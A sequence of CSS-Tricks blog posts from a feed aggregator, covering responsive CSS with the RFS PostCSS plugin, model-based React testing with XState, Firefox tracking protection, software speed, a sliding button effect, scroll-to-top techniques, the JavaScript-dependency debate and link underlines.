Next step is to add RFS to the PostCSS plugins list. If you’re using a postcss.config.js file, you can add it to the list of other PostCSS plugins (e.g. Autoprefixer):

module.exports = { plugins: [ require('rfs'), require('autoprefixer'), ] }

Once configured, you’ll be able to use the rfs() function wherever you want in your custom CSS. For example, if you want your font sizes to be responsive:

.title { font-size: rfs(4rem); }

...or use it with whatever property you want:

.card { background-color: #fff; border-radius: rfs(4rem); box-shadow: rfs(0 0 2rem rgba(0, 0, 0, .25)); margin: rfs(2rem); max-width: 540px; padding: rfs(3rem); }

The code above will output the following CSS:

.card { background-color: #fff; border-radius: calc(1.525rem + 3.3vw); box-shadow: 0 0 calc(1.325rem + 0.9vw) rgba(0, 0, 0, .25); margin: calc(1.325rem + 0.9vw); max-width: 540px; padding: calc(1.425rem + 2.1vw); } @media (min-width: 1200px) { .card { border-radius: 4rem; box-shadow: 0 0 2rem rgba(0, 0, 0, .25); margin: 2rem; padding: 3rem; } } Demo

Here's a Pen that shows how things work. You can resize the demo to see the fluid rescaling in action.

See the Pen
RFS card- PostCSS
by Martijn Cuppens (@MartijnCuppens)
on CodePen.

A deeper look at how RFS parses the CSS

The plugin will look for any occurance of the rfs() function in the declaration values and replace the function with a fluid value using the calc() function. After each rule, RFS will generate a media query with some additional CSS that prevents the values from becoming too large.

RFS only converts px and rem values in a declaration; all other values (e.g. em values, numbers or colors) will be ignored. The function can also be used multiple times in a declaration, like this:

box-shadow: 0 rfs(2rem) rfs(1.5rem) rgba(0, 0, 255, .6) RFS and custom properties :root { --title-font-size: rfs(2.125rem); --card-padding: rfs(3rem); --card-margin: rfs(2rem); --card-border-radius: rfs(4rem); --card-box-shadow: rfs(0 0 2rem rgba(0, 0, 0, .25)); }

These variables can be used in your CSS later on.

.card { max-width: 540px; padding: var(--card-padding); margin: var(--card-margin); background-color: #fff; box-shadow: var(--card-box-shadow); border-radius: var(--card-border-radius); }

Hopefully you find these updates useful in your work. Leave a comment if you have any questions or feedback!

The post Using a PostCSS function to automate your responsive workflow appeared first on CSS-Tricks.

Learn Design for Developers and SVG Animation with Sarah Drasner ?????

Css Tricks - Thu, 09/05/2019 - 4:16am

(This is a sponsored post.)

Hey, Marc here from Frontend Masters — excited to support CSS-Tricks ❤️!

Have you checked out Sarah Drasner's courses yet? She has two awesome courses on Design for Developers and SVG! Plus another introducing Vue.js!

Design for Developers

In the Design for Developers course, you’ll learn to become self-sufficient throughout the entire lifecycle of the project — from concept to design to implementation!

You’ll learn to...

  • Code dynamic layouts and understand the principles of composition.
  • Select the typography that compliments your design by following simple rules.
  • Choose colors palettes, and understand the theories to understand why they work together.
  • Know how and when to reach for design tools such as Photoshop or Sketch.
  • Use the correct image formats for performance.
  • Prototype to quickly communicate your ideas and get your layout up-and-running.
SVG Essentials and Animation

In the SVG Essentials and Animation course, you’ll learn to build and optimize SVG – the scalable graphics format for the web that can achieve impressively small file sizes for fast-loading websites.

You’ll learn to...

  • 〰 Create platonic and custom shapes with path commands.
  • ⚡️ Optimize SVG to achieve smaller file sizes for performance.
  • &#x1f4bb; Assemble new SVGs with code and graphics programs.
  • &#x1f5b1; Control complex animations and timelines with user input.
  • &#x1f4a5; Leverage GreenSock’s JavaScript libraries for immersive animation effects.
Introduction to Vue.js

In the Introduction to Vue.js course, you'll get started quickly with the Vue.js JavaScript framework!

You'll learn to...

  • Build custom, reusable components and animate them.
  • Use props, slots, and scoped styles to create flexible components.
  • Grok advanced features like filters and mixins for transforming data.
  • Get a single page application up and running fast with the Vue-CLI.
  • Work with Vuex to manage the state of larger-scale applications.

This course is for developers with an intermediate knowledge of JavaScript who want to learn how to build and maintain complex applications quickly and efficiently.

You'll love Sarah's awesome courses!

Direct Link to ArticlePermalink

The post Learn Design for Developers and SVG Animation with Sarah Drasner ✨&#x1f496; appeared first on CSS-Tricks.

Multiline truncated text with “show more” button

Css Tricks - Wed, 09/04/2019 - 11:53am

Now that we've got cross-browser support for the line-clamp property, I expect we'll see a lot more of that around the web. And as we start to see it more in use, it’s worth the reminder that: Truncation is not a content strategy.

We should at least offer a way to read that that truncated content, right? Paul Bakaus uses the checkbox hack and some other trickery to add a functional button that does exactly that.

See the Pen
truncated text w/ more button (CSS only, with optional JS helper)
by Paul Bakaus (@pbakaus)
on CodePen.

Direct Link to ArticlePermalink

The post Multiline truncated text with “show more” button appeared first on CSS-Tricks.

Model-Based Testing in React with State Machines

Css Tricks - Wed, 09/04/2019 - 4:24am

Testing applications is crucially important to ensuring that the code is error-free and the logic requirements are met. However, writing tests manually is tedious and prone to human bias and error. Furthermore, maintenance can be a nightmare, especially when features are added or business logic is changed. We’ll learn how model-based testing can eliminate the need to manually write integration and end-to-end tests, by automatically generating full tests that keep up-to-date with an abstract model for any app.

From unit tests to integration tests, end-to-end tests, and more, there are many different testing methods that are important in the development of non-trivial software applications. They all share a common goal, but at different levels: ensure that when anyone uses the application, it behaves exactly as expected without any unintended states, bugs, or worse, crashes.

Testing Trophy showing importance of different types of tests

Kent C. Dodds describes the practical importance of writing these tests in his article, Write tests. Not too many. Mostly integration. Some tests, like static and unit tests, are easy to author, but don't completely ensure that every unit will work together. Other tests, like integration and end-to-end (E2E) tests, take more time to author, but give you much more confidence that the application will work as the user expects, since they replicate scenarios similar to how a user would use the application in real life.

So why are there never many integration nor E2E in applications nowadays, yet hundreds (if not thousands) of unit tests? The reasons range from not enough resources, not enough time, or not enough understanding of the importance of writing these tests. Furthermore, even if numerous integration/E2E tests are written, if one part of the application changes, most of those long and complicated tests need to be rewritten, and new tests need to be written. Under deadlines, this quickly becomes infeasible.

From Automated to Autogenerated

The status-quo of application testing is:

  1. Manual testing, where no automated tests exist, and app features and user flows are tested manually
  2. Writing automated tests, which are scripted tests that can be executed automatically by a program, instead of being manually tested by a human
  3. Test automation, which is the strategy for executing these automated tests in the development cycle.

Needless to say, test automation saves a lot of time in executing the tests, but the tests still need to be manually written. It would sure be nice to tell some sort of tool: "Here is a description of how the application is supposed to behave. Now generate all the tests, even the edge cases."

Thankfully, this idea already exists (and has been researched for decades), and it's called model-based testing. Here's how it works:

  1. An abstract "model" that describes the behavior of your application (in the form of a directed graph) is created
  2. Test paths are generated from the directed graph
  3. Each "step" in the test path is mapped to a test that can be executed on the application.

Each integration and E2E test is essentially a series of steps that alternate between:

  1. Verify that the application looks correct (a state)
  2. Simulate some action (to produce an event)
  3. Verify that the application looks right after the action (another state)

If you’re familiar with the given-when-then style of behavioral testing, this will look familiar:

  1. Given some initial state (precondition)
  2. When some action occurs (behavior)
  3. Then some new state is expected (postcondition).

A model can describe all the possible states and events, and automatically generate the "paths" needed to get from one state to another, just like Google Maps can generate the possible routes between one location and another. Just like a map route, each path is a collection of steps needed to get from point A to point B.

Integration Testing Without a Model

To better explain this, consider a simple "feedback" application. We can describe it like so:

  • A panel appears asking the user, "How was your experience?"
  • The user can click "Good" or "Bad"
  • When the user clicks "Good," a screen saying "Thanks for your feedback" appears.
  • When the user clicks "Bad," a form appears, asking for further information.
  • The user can optionally fill out the form and submit the feedback.
  • When the form is submitted, the thanks screen appears.
  • The user can click "Close" or press the Escape key to close the feedback app on any screen.

See the Pen
Untitled by David Khourshid(
@davidkpiano)
on CodePen.

Manually Testing the App

The @testing-library/react library makes it straightforward to render React apps in a testing environment with its render() function. This returns useful methods, such as:

  • getByText, which identifies DOM elements by the text contained inside of them
  • baseElement, which represents the root document.documentElement and will be used to trigger a keyDown event
  • queryByText, which will not throw an error if a DOM element containing the specified text is missing (so we can assert that nothing is rendered)
import Feedback from './App'; import { render, fireEvent, cleanup } from 'react-testing-library'; // ... // Render the feedback app const { getByText, getByTitle, getByPlaceholderText, baseElement, queryByText } = render(<Feedback />); // ...

More information can be found in the @testing-library/react documentation. Let's write a couple integration tests for this with Jest (or Mocha) and @testing-library/react:

import { render, fireEvent, cleanup } from '@testing-library/react'; describe('feedback app', () => { afterEach(cleanup); it('should show the thanks screen when "Good" is clicked', () => { const { getByText } = render(<Feedback />); // The question screen should be visible at first assert.ok(getByText('How was your experience?')); // Click the "Good" button fireEvent.click(getByText('Good')); // Now the thanks screen should be visible assert.ok(getByText('Thanks for your feedback.')); }); it('should show the form screen when "Bad" is clicked', () => { const { getByText } = render(<Feedback />); // The question screen should be visible at first assert.ok(getByText('How was your experience?')); // Click the "Bad" button fireEvent.click(getByText('Bad')); // Now the form screen should be visible assert.ok(getByText('Care to tell us why?')); }); });

Not too bad, but you'll notice that there's some repetition going on. At first, this isn't a big deal (tests shouldn't necessarily be DRY), but these tests can become less maintainable when:

  • Application behavior changes, such as adding a new steps or deleting steps
  • User interface elements change, in a way that might not even be a simple component change (such as trading a button for a keyboard shortcut or gesture)
  • Edge cases start occurring and need to be accounted for.

Furthermore, E2E tests will test the exact same behavior (albeit in a more realistic testing environment, such as a live browser with Puppeteer or Selenium), yet they cannot reuse the same tests since the code for executing the tests is incompatible with those environments.

The State Machine as an Abstract Model

Remember the informal description of our feedback app above? We can translate that into a model that represents the different states, events, and transitions between states the app can be in; in other words, a finite state machine. A finite state machine is a representation of:

  • The finite states in the app (e.g., question, form, thanks, closed)
  • An initial state (e.g., question)
  • The events that can occur in the app (e.g., CLICK_GOOD, CLICK_BAD for clicking the good/bad buttons, CLOSE for clicking the close button, and SUBMIT for submitting the form)
  • Transitions, or how one state transitions to another state due to an event (e.g., when in the question state and the CLICK_GOOD action is performed, the user is now in the thanks state)
  • Final states (e.g., closed), if applicable.

The feedback app's behavior can be represented with these states, events, and transitions in a finite state machine, and looks like this:

A visual representation can be generated from a JSON-like description of the state machine, using XState:

import { Machine } from 'xstate'; const feedbackMachine = Machine({ id: 'feedback', initial: 'question', states: { question: { on: { CLICK_GOOD: 'thanks', CLICK_BAD: 'form', CLOSE: 'closed' } }, form: { on: { SUBMIT: 'thanks', CLOSE: 'closed' } }, thanks: { on: { CLOSE: 'closed' } }, closed: { type: 'final' } } });

If you're interested in diving deeper into XState, you can read the XState docs, or read a great article about using XState with React by Jon Bellah. Note that this finite state machine is used only for testing, and not in our actual application — this is an important principle of model-based testing, because it represents how the user expects the app to behave, and not its actual implementation details. The app doesn’t necessarily need to be created with finite state machines in mind (although it’s a very helpful practice).

Creating a Test Model

The app's behavior is now described as a directed graph, where the nodes are states and the edges (or arrows) are events that denote the transitions between states. We can use that state machine (the abstract representation of the behavior) to create a test model. The @xstate/graph library contains a createModel function to do that:

import { Machine } from 'xstate'; import { createModel } from '@xstate/test'; const feedbackMachine = Machine({/* ... */}); const feedbackModel = createModel(feedbackMachine);

This test model is an abstract model which represents the desired behavior of the system under test (SUT) — in this example, our app. With this testing model, test plans can be created which we can use to test that the SUT can reach each state in the model. A test plan describes the test paths that can be taken to reach a target state.

Verifying States

Right now, this model is a bit useless. It can generate test paths (as we’ll see in the next section) but to serve its purpose as a model for testing, we need to add a test for each of the states. The @xstate/test package will read these test functions from meta.test:

const feedbackMachine = Machine({ id: 'feedback', initial: 'question', states: { question: { on: { CLICK_GOOD: 'thanks', CLICK_BAD: 'form', CLOSE: 'closed' }, meta: { // getByTestId, etc. will be passed into path.test(...) later. test: ({ getByTestId }) => { assert.ok(getByTestId('question-screen')); } } }, // ... etc. } });

Notice that these are the same assertions from the manually written tests we’ve created previously with @testing-library/react. The purpose of these tests is to verify the precondition that the SUT is in the given state before executing an event.

Executing Events

To make our test model complete, we need to make each of the events, such as CLICK_GOOD or CLOSE, “real” and executable. That is, we have to map these events to actual actions that will be executed in the SUT. The execution functions for each of these events are specified in createModel(…).withEvents(…):

import { Machine } from 'xstate'; import { createModel } from '@xstate/test'; const feedbackMachine = Machine({/* ... */}); const feedbackModel = createModel(feedbackMachine) .withEvents({ // getByTestId, etc. will be passed into path.test(...) later. CLICK_GOOD: ({ getByText }) => { fireEvent.click(getByText('Good')); }, CLICK_BAD: ({ getByText }) => { fireEvent.click(getByText('Bad')); }, CLOSE: ({ getByTestId }) => { fireEvent.click(getByTestId('close-button')); }, SUBMIT: { exec: async ({ getByTestId }, event) => { fireEvent.change(getByTestId('response-input'), { target: { value: event.value } }); fireEvent.click(getByTestId('submit-button')); }, cases: [{ value: 'something' }, { value: '' }] } });

Notice that you can either specify each event as an execution function, or (in the case of SUBMIT) as an object with the execution function specified in exec and sample event cases specified in cases.

From Model To Test Paths

Take a look at the visualization again and follow the arrows, starting from the initial question state. You'll notice that there are many possible paths you can take to reach any other state. For example:

  • From the question state, the CLICK_GOOD event transitions to...
  • the form state, and then the SUBMIT event transitions to...
  • the thanks state, and then the CLOSE event transitions to...
  • the closed state.

Since the app's behavior is a directed graph, we can generate all the possible simple paths or shortest paths from the initial state. A simple path is a path where no node is repeated. That is, we're assuming the user isn't going to visit a state more than once (although that might be a valid thing to test for in the future). A shortest path is the shortest of these simple paths.

Rather than explaining algorithms for traversing graphs to find shortest paths (Vaidehi Joshi has great articles on graph traversal if you're interested in that), the test model we created with @xstate/test has a .getSimplePathPlans(…) method that generates test plans.

Each test plan represents a target state and simple paths from the initial state to that target state. Each test path represents a series of steps to get to that target state, with each step including a state (precondition) and an event (action) that is executed after verifying that the app is in the state.

For example, a single test plan can represent reaching the thanks state, and that test plan can have one or more paths for reaching that state, such as question -- CLICK_BAD ? form -- SUBMIT ? thanks, or question -- CLICK_GOOD ? thanks:

testPlans.forEach(plan => { describe(plan.description, () => { // ... }); });

We can then loop over these plans to describe each state. The plan.description is provided by @xstate/test, such as reaches state: "question":

// Get test plans to all states via simple paths const testPlans = testModel.getSimplePathPlans();

And each path in plan.paths can be tested, also with a provided path.description like via CLICK_GOOD ? CLOSE:

testPlans.forEach(plan => { describe(plan.description, () => { // Do any cleanup work after testing each path afterEach(cleanup); plan.paths.forEach(path => { it(path.description, async () => { // Test setup const rendered = render(<Feedback />); // Test execution await path.test(rendered); }); }); }); });

Testing a path with path.test(…) involves:

  1. Verifying that the app is in some state of a path’s step
  2. Executing the action associated with the event of a path’s step
  3. Repeating 1. and 2. until there are no more steps
  4. Finally, verifying that the app is in the target plan.state.

Finally, we want to ensure that each of the states in our test model were tested. When the tests are run, the test model keeps track of the tested states, and provides a testModel.testCoverage() function which will fail if not all states were covered:

it('coverage', () => { testModel.testCoverage(); });

Overall, our test suite looks like this:

import React from 'react'; import Feedback from './App'; import { Machine } from 'xstate'; import { render, fireEvent, cleanup } from '@testing-library/react'; import { assert } from 'chai'; import { createModel } from '@xstate/test'; describe('feedback app', () => { const feedbackMachine = Machine({/* ... */}); const testModel = createModel(feedbackMachine) .withEvents({/* ... */}); const testPlans = testModel.getSimplePathPlans(); testPlans.forEach(plan => { describe(plan.description, () => { afterEach(cleanup); plan.paths.forEach(path => { it(path.description, () => { const rendered = render(<Feedback />); return path.test(rendered); }); }); }); }); it('coverage', () => { testModel.testCoverage(); }); });

This might seem like a bit of setup, but manually scripted integration tests need to have all of this setup anyway, in a much less abstracted way. One of the major advantages of model-based testing is that you only need to set this up once, whether you have 10 tests or 1,000 tests generated.

Running the Tests

In create-react-app, the tests are ran using Jest via the command npm test (or yarn test). When the tests are ran, assuming they all pass, the output will look something like this:

PASS src/App.test.js feedback app ? coverage reaches state: "question" ? via (44ms) reaches state: "thanks" ? via CLICK_GOOD (17ms) ? via CLICK_BAD ? SUBMIT ({"value":"something"}) (13ms) reaches state: "closed" ? via CLICK_GOOD ? CLOSE (6ms) ? via CLICK_BAD ? SUBMIT ({"value":"something"}) ? CLOSE (11ms) ? via CLICK_BAD ? CLOSE (10ms) ? via CLOSE (4ms) reaches state: "form" ? via CLICK_BAD (5ms) Test Suites: 1 passed, 1 total Tests: 9 passed, 9 total Snapshots: 0 total Time: 2.834s

That's nine tests automatically generated with our finite state machine model of the app! Every single one of those tests asserts that the app is in the correct state and that the proper actions are executed (and validated) to transition to the next state at each step, and finally asserts that the app is in the correct target state.

These tests can quickly grow as your app gets more complex; for instance, if you add a back button to each screen or add some validation logic to the form page (please don't; be thankful the user is even going through the feedback form in the first place) or add a loading state submitting the form, the number of possible paths will increase.

Advantages of Model-Based Testing

Model-based testing greatly simplifies the creation of integration and E2E tests by autogenerating them based on a model (like a finite state machine), as demonstrated above. Since manually writing full tests is eliminated from the test creation process, adding or removing new features no longer becomes a test maintenance burden. The abstract model only needs to be updated, without touching any other part of the testing code.

For example, if you want to add the feature that the form shows up whether the user clicks the "Good" or "Bad" button, it's a one-line change in the finite state machine:

// ... question: { on: { // CLICK_GOOD: 'thanks', CLICK_GOOD: 'form', CLICK_BAD: 'form', CLOSE: 'closed', ESC: 'closed' }, meta: {/* ... */} }, // ...

All tests that are affected by the new behavior will be updated. Test maintenance is reduced to maintaining the model, which saves time and prevents errors that can be made in manually updating tests. This has been shown to improve efficiency in both developing and testing production applications, especially as used at Microsoft on recent customer projects — when new features were added or changes made, the autogenerated tests gave immediate feedback on which parts of the app logic were affected, without needing to manually regression test various flows.

Additionally, since the model is abstract and not tied to implementation details, the exact same model, as well as most of the testing code, can be used to author E2E tests. The only things that would change are the tests for verifying the state and the execution of the actions. For example, if you were using Puppeteer, you can update the state machine:

// ... question: { on: { CLICK_GOOD: 'thanks', CLICK_BAD: 'form', CLOSE: 'closed' }, meta: { test: async (page) => { await page.waitFor('[data-testid="question-screen"]'); } } }, // ... const testModel = createModel(/* ... */) .withEvents({ CLICK_GOOD: async (page) => { const goodButton = await page.$('[data-testid="good-button"]'); await goodButton.click(); }, // ... });

And then these tests can be run against a live Chromium browser instance:

The tests are autogenerated the same, and this cannot be overstated. Although it just seems like a fancy way to create DRY test code, it goes exponentially further than that — autogenerated tests can exhaustively represent paths that explore all the possible actions a user can do at all possible states in the app, which can readily expose edge-cases that you might not have even imagined.

The code for both the integration tests with @testing-library/react and the E2E tests with Puppeteer can be found in the the XState test demo repository.

Challenges to Model-Based Testing

Since model-based testing shifts the work from manually writing tests to manually writing models, there is a learning curve. Creating the model necessitates the understanding of finite state machines, and possibly even statecharts. Learning these are greatly beneficial for more reasons than just testing, since finite state machines are one of the core principles of computer science, and statecharts make state machines more flexible and scalable for complex app and software development. The World of Statecharts by Erik Mogensen is a great resource for understanding and learning how statecharts work.

Another issue is that the algorithm for traversing the finite state machine can generate exponentially many test paths. This can be considered a good problem to have, since every one of those paths represents a valid way that a user can potentially interact with an app. However, this can also be computationally expensive and result in semi-redundant tests that your team would rather skip to save testing time. There are also ways to limit these test paths, e.g., using shortest paths instead of simple paths, or by refactoring the model. Excessive tests can be a sign of an overly complex model (or even an overly complex app &#x1f609;).

Write Fewer Tests!

Modeling app behavior is not the easiest thing to do, but there are many benefits of representing your app as a declarative and abstract model, such as a finite state machine or a statechart. Even though the concept of model-based testing is over two decades old, it is still an evolving field. But with the above techniques, you can get started today and take advantage of generating integration and E2E tests instead of manually writing every single one of them.

More resources:

I gave a talk at React Rally 2019 demonstrating model-based testing in React apps:

Slides: Slides: Write Fewer Tests! From Automation to Autogeneration

Happy testing!

The post Model-Based Testing in React with State Machines appeared first on CSS-Tricks.

Firefox blocks third-party tracking cookies and cryptominers

Css Tricks - Wed, 09/04/2019 - 4:18am

This is super interesting stuff from Mozilla: the most recent update of Firefox will now block cryptominers and third-party tracking scripts by default. In the press release they write:

For today’s release, Enhanced Tracking Protection will automatically be turned on by default for all users worldwide as part of the ‘Standard’ setting in the Firefox browser and will block known “third-party tracking cookies” according to the Disconnect list. We first enabled this default feature for new users in June 2019. As part of this journey we rigorously tested, refined, and ultimately landed on a new approach to anti-tracking that is core to delivering on our promise of privacy and security as central aspects of your Firefox experience.

Compare this to A Vox interview with Mat Marquis discussing Google's efforts to make Chrome more private:

“Google is an advertising company, not a group of concerned altruists; there aren’t any charts at stakeholder meetings showing what amount they ‘saved the web’ this past quarter. They’re notorious for overstepping and outright abusing users’ personal data in pursuit of, well, making money as an advertising company,” Mat Marquis, a web developer, told Recode. “Their business model — the thing that keeps all these genuinely brilliant, genuinely well-meaning designers and developers employed — depends on convincing a company that they can make their users look at your ads.”

This is yet another reason why Firefox is my browser of choice and why, as concerned web designers and developers, I suggest others consider joining me in making the switch.

Direct Link to ArticlePermalink

The post Firefox blocks third-party tracking cookies and cryptominers appeared first on CSS-Tricks.

Fast Software

Css Tricks - Tue, 09/03/2019 - 4:22am

There have been some wonderfully interconnected things about fast software lately.

We talk a lot of performance on the web. We can make things a little faster here and there. We see rises in success metrics with rises in performance. I find those type of charts very satisfying. But perhaps even more interesting is to think about the individual people that speed affects. It can be the difference between I love this software and Screw this, I'm out.

Craig Mod, in "Fast Software, the Best Software", totally bailed on Google Maps:

Google Maps has gotten so slow, that I did the unthinkable: I reinstalled Apple Maps on my iPhone. Apple Maps in contrast, today, is downright zippy and responsive. The data still isn’t as good as Google Maps, but this a good example of where slowness pushed me to reinstall an app I had all but written off. I’ll give Apple Maps more of a chance going forward.

And puts a point on it:

But why is slow bad? Fast software is not always good software, but slow software is rarely able to rise to greatness. Fast software gives the user a chance to “meld” with its toolset. That is, not break flow.

Sometimes it's even life and death! Hillel Wayne, in "Performance Matters," says emergency workers in an ambulance don't use the built-in digital "Patient Care Report" (PCR) system, instead opting for paper and pencil, simply because the PCR is a little slow:

The ambulance I shadowed had an ePCR. Nobody used it. I talked to the EMTs about this, and they said nobody they knew used it either. Lack of training? «No, we all got trained.» Crippling bugs? No, it worked fine. Paper was good enough? No, the ePCR was much better than paper PCRs in almost every way. It just had one problem: it was too slow.

It wasn’t even that slow. Something like a quarter-second lag when you opened a dropdown or clicked a button. But it made things so unpleasant that nobody wanted to touch it. Paper was slow and annoying and easy to screw up, but at least it wasn’t that.

"Input delay" is a key concept here. Just the kind of thing that can occur on the web if your JavaScript is doin' stuff and, as they say, "occupying the main thread."

Monica Dinculescu created a Typing delay experiment that simulates this input delay. The "we're done here" setting of 200ms is absolutely well-named. I'd never use software that felt like that. Jay Peters over on The Verge agreed, and anything higher is exponentially worse.

Extra interesting: random delay is worse than consistent large delays, which is probably a more likely scenario on our own sites.

The post Fast Software appeared first on CSS-Tricks.

Recreating Netlify’s Neat-o Sliding Button Effect

Css Tricks - Tue, 09/03/2019 - 4:22am

Have you seen Netlify's press page? It's one of those places where you can snag a download of the company's logo. I was looking for it this morning because I needed the logo to use as a featured image for a post here on CSS-Tricks.

Well, I noticed they have these pretty looking buttons to download the logo. They're small and sharp. They grab attention but aren't in the way.

They're also interactive! Look at the way they expand and reveal the word "Download" on hover.

Nice, right?! I actually noticed that they looked a little off in Safari.

That made me curious about how they're made. So, I recreated them here as a demo while cleaning up some of the spacing stuff:

See the Pen
Netlify Sliding Buttons
by Geoff Graham (@geoffgraham)
on CodePen.

How'd they do it? The recipe really comes down to four ingredients:

  • Using the left property to slide the "Download" label in and out of view
  • Using padding on the button's hover state to create additional room for showing the "Download" label on hover
  • Declaring a 1:1 scale() on the button's hover state so all the content stays contained when things move around.
  • Specifiying a transition on the button's padding, the background-position of the button icon and the transform property to make for a smooth animation between the button's default and hover states.

Here's what that looks like without all the presentation styles:

See the Pen
Style-less Netlify Sliding Buttons
by Geoff Graham (@geoffgraham)
on CodePen.

If you're having a tough time visualizing what's happening, here's an illustration showing how the "Download" label is hidden outside of the button (thanks to overflow: hidden) and where it's pushed into view on hover.

So, by putting negative left values on the icon and the "Download" label, we're pushing them out of view and then resetting those to positive values when the entire button is hovered.

/* Natural State */ .button { background: #f6bc00 url(data:image/svg+xml;base64,...) no-repeat -12px center; overflow: hidden; } .button span:nth-child(1) { position: absolute; left: -70px; } /* Hovered State */ .button:hover { padding-left: 95px; background-position: 5px center; } .button span:nth-child(1) { position: absolute; left: -70px; }

Notice that leaving things in this state would let the button icon slide into view and create enough room for the "Download" label, but the label would actually float off the button on hover.

See the Pen
Style-less Netlify Sliding Buttons
by Geoff Graham (@geoffgraham)
on CodePen.

That's where adding a 1:1 scale on the button helps keep things in tact.

* Hovered State */ .button:hover { padding-left: 95px; background-position: 5px center; transform: scale(1, 1); }

Those padding values are magic numbers. They'll be different for you based on the font, font-size, and other factors, so your mileage may vary.

The last core ingredient is the transition property, which makes everything slide smoothly into place rather than letting them snap. It's provides a much nicer experience.

/* Natural State */ .button { background: #f6bc00 url(data:image/svg+xml;base64,...) no-repeat -12px center; overflow: hidden; transition: padding .2s ease, background-position .2s ease, transform .5s ease; }

Toss in some little flourishes, like rounded corners and such, and you've got a pretty slick button.

See the Pen
Netlify Sliding Buttons
by Geoff Graham (@geoffgraham)
on CodePen.

The post Recreating Netlify’s Neat-o Sliding Button Effect appeared first on CSS-Tricks.

Need to scroll to the top of the page?

Css Tricks - Mon, 09/02/2019 - 4:07am

Perhaps the easiest way to offer that to the user is a link that targets an ID on the <html> element. So like...

<html id="top"> <body> <!-- the entire document --> <a href="#top">Jump to top of page</a> </body> </html>

But we've got a few options here.

If you want it to smooth scroll up to the top, you can do that in CSS if you like:

html { scroll-behavior: smooth; }

Note that placing a property on the HTML element like that is all-encompassing behavior you don't have much control over.

In this case, we aren't linking to a focusable element either, which means that focus won't change. That's probably important, so this would be better:

<html> <body> <a id="top"></a> <!-- the entire document --> <a href="#top">Jump to top of page</a> </body> </html>

It's better because the focus will move to that anchor tag, which is good for people using the keyboard or assistive technology.

These require clicks though. You might need to trigger scrolling within JavaScript, in which case:

window.scrollTo(0, 0);

...is a sure bet to scroll the window (or any other element) back to the top. The scrolling behavior of that is determined by CSS as well, but if you aren't doing that, you can force the smoothness in JavaScript:

window.scroll({ top: 0, left: 0, behavior: 'smooth' });

For a more complete story about smooth scrolling, we have a page for that.

The post Need to scroll to the top of the page? appeared first on CSS-Tricks.

Should a website work without JavaScript?

Css Tricks - Mon, 09/02/2019 - 4:07am

The JS Party podcast just had a fun episode where they debated this classic question by splitting into two groups of two. Each group was assigned a "side" of this debate, and then let loose to debate it. I don't think anybody can listen to a show like this and not be totally flooded with thoughts! Here are mine.

  • This is one of those holy war arguments that has raged on for years. Perhaps that’s because people are seeking an answer that applies to the entire web, and the web is too big to pin this broad of an answer to.
  • The question itself worth a look. Why are we talking about hamstringing our sites in this particular way? Should our websites work without HTML? Should our websites work without databases? Perhaps we focus on JavaScript the most because JavaScript has become the largest bottleneck of web performance (even more so than the network!) and we experience failed JavaScript more so than any other type of web failure (except, perhaps, entire sites not loading) (or icons fonts, jeez).
  • I enjoyed all the stumbling around the terminology of "web apps" and "web sites" (web things!). This is such a weird one. It's so easy to picture the difference in your head: it's like facebook versus a blog! But when you start trying to define it exactly, it gets really murky really quickly and the distinction loses any value, if it had any to start with. Here's more on that.
  • Accessibility is certainly involved in all conversation about the web, but it probably can't be broadly applied here. There is a notion that assistive tech doesn’t run JavaScript — so a site that requires JavaScript to use it is a 100% fail for those users. Best I know, that’s entirely not the case anymore. We can debate to death the role of JavaScript in accessibility problems, but just because a particular site requires JavaScript to run doesn't by itself render the site inaccessible.
  • It’s easy enough to flip off JavaScript, browse around the web, find broken things, and chinflip them for this apparent failure. The failure being that this site, or a feature on the site, could have been architected to work without JavaScript. Rule of least power. This is tricky. It’s easy not to care about a person who has intentionally disabled a part of their web browser and still wants everything to work. I straight up don’t care about that. But the resiliency part is more interesting. If you do build a part of a site to work without JavaScript, it will work both before and after the JavaScript executes, which is pretty great.
  • The concept of building functional content and features without JavaScript and enhancing the experience with JavaScript is called progressive enhancement. I'm both a fan and careful not to insist that everything on earth is always to be built that way (see top bullet point). There are situations where progressive enhancement both increases and reduces technical debt. The only wide brush I'd use here is to say that it's worth doing until the debt is too high.
  • There is an in-between moment with progressive enhancement. If a feature is functional without JavaScript, that means it's likely you are deferring the loading of that JavaScript for the performance benefit. But it does eventually need to be downloaded and executed. What happens during that time? There is a performance and UX cost there. Best case, it's negligible. Worst case, you break the feature during this in-between time.
  • I find it more interesting to debate this kind of thing on a site-by-site and feature-by-feature basis. Application holotypes might be an interesting way to scope it. They often turned to Slack as an example which is a perfect choice. How would you build a 20-author movie review site? How you would architect a social and media-heavy site like Dribbble? How do you build dropdown navigation? What about a one-page brochure site where the client wants parallax? How about an airline app that needs a native mobile app as well? And of course, it makes you think about sites you work on yourself. Does CodePen run on the right set of technologies? Does CSS-Tricks?
  • If a site is "client-side rendered" (CSR), that means JavaScript is doing the data fetching and creating the DOM and all that. If we're talking about websites "working" or not with our without JavaScript, a site that is client-side rendered will 100% fail without JavaScript. It is sort of the opposite of "server-side rendered" (SSR) in which the document comes down as HTML right from the server. SSR is almost certainly faster for a first-loading experience. CSR, typically, is faster to move around the site after loading (think "single page app," or SPA).
  • It's not just SSR vs. CSR — there is a whole spectrum. It's more and more common to see sites try to take advantage of the best of both worlds. For example, Next/Nuxt/Gatsby, or Ember's fastboot.
  • Service workers are JavaScript. Web workers are JavaScript. Some of the fancy resilience and performance features of the web are powered by the same technology that causes the grief we debate about.

The post Should a website work without JavaScript? appeared first on CSS-Tricks.

Styling Links with Real Underlines

Css Tricks - Fri, 08/30/2019 - 4:31am

Before we come to how to style underlines, we should answer the question: should we underline?

In graphic design, underlines are generally seen as unsophisticated. There are nicer ways to draw emphasis, to establish hierarchy, and to demarcate titles.

That’s clear in this advice from Butterick’s "Practical Typography":

If you feel the urge to underline, use bold or italic instead. In special situations, like headings, you can also consider using all caps, small caps, or changing the point size. Not convinced? I invite you to find a book, newspaper, or magazine that underlines text. That look is mostly associated with supermarket tabloids.

But the web is different. Hyperlinks are the defining feature of the internet; and from the internet’s inception, they have been underlined. It’s a universally understood convention. The meaning is crystal clear — an underline means a link.

However, plenty of popular websites have ditched underlines: The New York Times, New York Magazine, The Washington Post, Bloomberg, Amazon, Apple, GitHub, Twitter, Wikipedia. When they removed underlines from their search results page in 2014, Google lead designer Jon Wiley argued that it created a cleaner look. Notably though, the majority of these sites have kept slight variances on the traditional lurid blue color (#0000EE) that’s been the browser default since the beginning of the web. While this provides a visual cue for the majority of users, it may not be enough to pass WCAG accessibility compliance.

